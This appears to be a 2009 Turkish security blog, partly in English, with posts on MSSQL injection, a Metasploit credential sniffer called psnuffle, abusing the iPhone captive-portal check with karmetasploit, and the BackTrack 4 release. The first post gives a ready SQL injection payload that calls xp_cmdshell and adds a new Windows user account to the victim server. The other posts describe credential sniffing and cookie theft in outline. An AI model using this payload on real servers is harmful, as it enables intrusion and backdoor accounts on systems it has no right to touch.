11 Eylül 2009 Cuma

MsSQL Injection ~ CmdShell Çalıştırma

MsSQL Injection yaparken uzaktan cmdshell çalıştırabiliyoruz.Şu komut ile cmdshelli çalıştırabilmekteyiz.

;exec master..xp_cmdshell ’’--

’’ bıraktıgım yer size kalan komutların kullanacagınız yer.

mesela en basitinden ’’ şu kısımın arasına bizim o meşhur MS SQL
password ve user oluşturma komutumuzu kullanabiliriz.

’net user /add Energyzer Energyzer7’

Tamamlayacak olursak

;exec master..xp_cmdshell ’net user / add Energyzer Energyzer7’--

10 Eylül 2009 Perşembe

Psnuffle password sniffer for metasploit

I submitted a new version of the psnuffle credential sniffer addon to the metasploit team. Until HDM has reviewed it and merged it into the svn i uploaded a tgz to remote-exploit.org's code section http://www.remote-exploit.org/codes/psnuffle/psnuffle_rexploit_org_09082009.tar.gz Please note that it will be removed when its officially available within the metasploit svn. Checkout the demo video http://vimeo.com/6013518 if you like to see it in action. Currently i included pop3, imap, ftp and a HTTP Get sniffer module. Modules are very simple to code, so i expect new ones every few days.

Psnuffle credentials sniffing module demo from Max Moser on Vimeo.

With psnuffle metasploit got a credential sniffer in place. Its easy to use and extens. Writing a new module just takes some minutes.

Not: Türkçeye çeviricem...


Lothar informed me about a strange behaviour of the iPhone running OS 3. It seems like the iPhone is automatically opening a browser when joining a network. (See video of the whole probleme here: http://www.vimeo.com/5466236)

The iPhone tries to do the following:

1. DNS querries for www.apple.com
2. Opening http://www.apple.com/library/test/success.html

When both are successful, then fine... the phone gets back "success" and everything is ok.
When both are failing... thats fine as well because then the phone assumes that the internet connection is not up and running.

BUT <-- isn't there always a BUT?! If the phone can succcessfully querry the name but get back any different content than "Success" it assumes that there is a captive portal which requires you to authenticate first to get access to the internet. This is true for many hotspots etc... so Apple was thinking.. damn thats annoying for the user... lets open up Safari automatically if this special case comes into place :-) Usability kills security .... together with karmetasploit its a very evil thing. Get Iphones cookies, accounts and maybe even system control... depending on the bugs you have left to test. You can see the whole thing as a video @vimeo http://www.vimeo.com/5466236 .... now lets find some new safari bugs :-)

And thank you lothar for the fish.

Not: Türkçeye çevirisini yapıcam...

9 Eylül 2009 Çarşamba

Backtrack 4 Beta ve Final çıktı

Backtrack 4 beta çıktı. En belirgin özelliklerden biri Pentest Live CD den tam bir dağıtıma geçmeleri.

Debian core paketlerine dayalı ve Ubuntu yazılım depolarını kullanan Backtrack kolayca güncellenebilecek. Senkronize edilerek yeni çıkan güvenlik araçlarına güncellenebilecek.

DVD imajı:
İndirmek için: http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
Boyutu: 854 MB
MD5: 7d1eb7f4748759e9735fee1b8a17c1d8

VMware imajı:
İndirmek için: http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-vm
Boyutu: 1 GB
MD5: MD5: 38acdcbaf6c73d7c55180dfea8641e5d

Final için

DVD imajı:
İndirmek için: http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
Boyutu: 1390 MB
MD5: b0485da6194d75b30cda282ceb629654

Yeni özelliklerden bazıları:
* Daha iyi donanım desteği ile Kernel
* Pico e12 ve e16 kartları doğal desteği artık tam olarak çalışıyor, bu da Backtrack'i bu müthiş minik makinaları tam olarak kullanan ilk sızma testi dağıtımı yapıyor.
* PXE Boot desteği - PXE destekli kartlar ile BackTrack'i ağdan boot edin!
* SAINT EXPLOIT - SAINT firması tarafından sınırlı sayıda IP ile kullanıcılarımıza sağlandı
* MALTEGO - Paterva'dakiler Maltego 2.0.2 ile müthiş bir iş yaptılar - community edition sürümü Backtrack'te bulunuyor.
* rt18187 injection hız artırmaları için çeşitli özel yamalarla birlikte en son mac80211 wireless injection yamaları uygulandı. Wireless injection desteği hiç bu kadar geniş ve fonksiyonel olmamıştı.
* Unicornscan - postgres loglama desteği ve bir web arayüzü ile tam olarak çalışıyor.
* RFID desteği
* Pyrit CUDA desteği...
* Yeni ve güncellenen araçlar - listenin sonu yok!
